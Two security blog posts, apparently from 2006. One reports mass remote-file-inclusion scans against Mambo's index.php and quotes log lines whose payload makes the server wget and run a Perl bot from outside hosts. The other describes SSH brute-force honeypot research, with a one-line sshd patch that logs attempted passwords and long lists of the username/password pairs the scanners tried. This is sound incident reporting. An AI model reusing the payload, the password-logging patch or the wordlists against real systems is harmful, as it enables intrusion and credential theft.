bookmark_borderHigh volume of web (mambo) scans.

Since Thursday night I’m seeing a high volume of scans
on different web servers for possibly the following vulns:

http://secunia.com/advisories/14337/http://www.osvdb.org/displayvuln.php?osvdb_id=10180

However, they say the problem is on function.php and I’m seeing them on index.php. Can anyone confirm that?
Some log samples below..

200.80.39.39 - - [12/May/2006:15:27:28 -0300] "GET
/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://luxsurf.com/images/cmd.txt?&cmd=cd%20/tmp;wget%20http://luxsurf.com/images/xentonix;perl%20xentonix;rm%20-rf%20xentonix?
HTTP/1.0" 404 167 "-" "Mozilla/5.0"
217.160.131.47 - - [12/May/2006:15:34:30 -0300] "GET
/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://toma.si/dare/cmd.txt?&cmd=cd%20/tmp;wget%20http://toma.si/dare/xentonix;perl%20xentonix;rm%20-rf%20xentonix?
HTTP/1.0" 404 167 "-" "Mozilla/5.0"
58.26.138.159 - - [12/May/2006:16:03:47 -0300] "GET
/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://toma.si/dare/cmd.txt?&cmd=cd%20/tmp;wget%20http://toma.si/dare/xentonix;perl%20xentonix;rm%20-rf%20xentonix?
HTTP/1.0" 404 167 "-" "Mozilla/5.0"
200.80.39.39 - - [12/May/2006:16:27:28 -0300] "GET
/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://luxsurf.com/images/cmd.txt?&cmd=cd%20/tmp;wget%20http://luxsurf.com/images/xentonix;perl%20xentonix;rm%20-rf%20xentonix?
HTTP/1.0" 404 167 "-" "Mozilla/5.0"
217.160.131.47 - - [12/May/2006:16:29:30 -0300] "GET
/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://toma.si/dare/cmd.txt?&cmd=cd%20/tmp;wget%20http://toma.si/dare/xentonix;perl%20xentonix;rm%20-rf%20xentonix?
HTTP/1.0" 404 167 "-" "Mozilla/5.0"
58.26.138.159 - - [12/May/2006:16:36:47 -0300] "GET
/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://toma.si/dare/cmd.txt?&cmd=cd%20/tmp;wget%20http://toma.si/dare/xentonix;perl%20xentonix;rm%20-rf%20xentonix?
HTTP/1.0" 404 167 "-" "Mozilla/5.0"
212.87.13.140 - - [12/May/2006:16:50:02 -0300] "GET
/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://radius01.comete.ci/tool.gif?&cmd=cd%20/tmp/;wget%20http://radius01.comete.ci/session.gif;perl%20session.gif;rm%20-rf%20session.*?
HTTP/1.0" 404 167 "-" "Mozilla/5.0"

These are just a few from 15:00 nd 17:00 pm yesterday.
Interesting is that they don’t do anything else, just
try to execute it and leave (without searching for
other paths)… Btw, I’m seeing these alerts from
ossec.

bookmark_borderInteresting information about SSH scans

I spent last week doing some research on the recently very active SSH scans and sent out the following e-mail to the incidents mailling list. Just some clarification before the e-mail itself:

1- My modified version of SSHD is very simple and I won’t plublish a diff. I basically just downloaded the last version from openssh.org and added these two lines on auth-passwd.c (on line 80 of the file — just after the beginning of the auth_password function):

if(strlen(password) > 1))
error(“user: %s, pass: %s”, authctxt->user, password);

2- Regarding the location of the scans, they look very
disperse (my boxes are in the US). I got two from Brazil,
one from the UK, one from NL, one from Japan, two from
India(from the same ISP), 2 from the USA and 1 from
Canada…

I set up some honeypots and also made a few
modifications to the ssh daemon to print out the
passwords these scans were trying to use. I noticed a
reduction in the number of scans, but I still got a
few in the last few days.

Basically I noticed 2 different scans.

** Scan 1 - Attempt many passwords against the root
account and a lot of attempts against common/default
accounts (with the password being the same as the
account name). Interesting is that some of the
passwords for root doesn't look very simple and some
use keyboard combinations (probably common too).
Received scans of this type from 7 different IPS (same
passwords, users, etc).

** Scan 2 - Attempt a lot of strange passwords against
the root and admin account. Look bellow to see why I
think they are strange. Looks like the scanner is
broken :)
Received scans of this type from 3 different IPS.

*** User, password combinations:

** Scan 1 (user, password combinations):
user root, pass: 1qaz2wsx
user root, pass: 1q2w3e4r5t6y
user root, pass: 1qaz2wsx3edc4rfv
user root, pass: qazwsxedcrfv
user root, pass: webmaster
user root, pass: michael
user root, pass: work
user root, pass: maggie
user root, pass: print
user root, pass: 123456
user root, pass: root1234
user root, pass: 1qaz2wsx3edc
user root, pass: qazwsxedc
user root, pass: qazwsx
user root, pass: internet
user root, pass: mobile
user root, pass: windows
user root, pass: superman
user root, pass: 1q2w3e4r
user root, pass: network
user root, pass: system
user root, pass: administrator
user root, pass: 123qwe
user root, pass: manager
user root, pass: redhat
user root, pass: fedora
user root, pass: okmnji
user root, pass: qwerty
user root, pass: httpd
user root, pass: linux
user root, pass: coder
user root, pass: www
user root, pass: 123123
user root, pass: 1234567890

user james, pass: james
user cvs, pass: cvs
user tony, pass: tony
user bill, pass: bill
user print, pass: print
user maggie, pass: maggie
user info, pass: info
user http, pass: http
user ftp, pass: ftp
user dany, pass: dany
user suse, pass: suse
user oracle, pass: oracle
user tomcat, pass: tomcat
user backup, pass: backup
user id, pass: id
user sgi, pass: sgi
user postgres, pass: postgres
user flowers, pass: flowers
user internet, pass: internet
user linux, pass: linux
user nokia, pass: nokia
user bash, pass: bash
user mysql, pass: mysql
user webmaster, pass: webmaster

** Scan 2 (user, password combinations):
These passwors look very strange... Does anyone
will ever use a password of root1234567890? :)

user root, pass: root12
user root, pass: root123
user root, pass: root1234
user root, pass: root12345
user root, pass: root123456
user root, pass: root1234567
user root, pass: root12345678
user root, pass: root123456789
user root, pass: root1234567890

user admin, pass: admin
user admin, pass: admin1
user admin, pass: admin12
user admin, pass: admin123
user admin, pass: admin1234
user admin, pass: admin12345
user admin, pass: admin123456
user admin, pass: admin1234567
user admin, pass: admin12345678
user admin, pass: admin123456789
user admin, pass: admin1234567890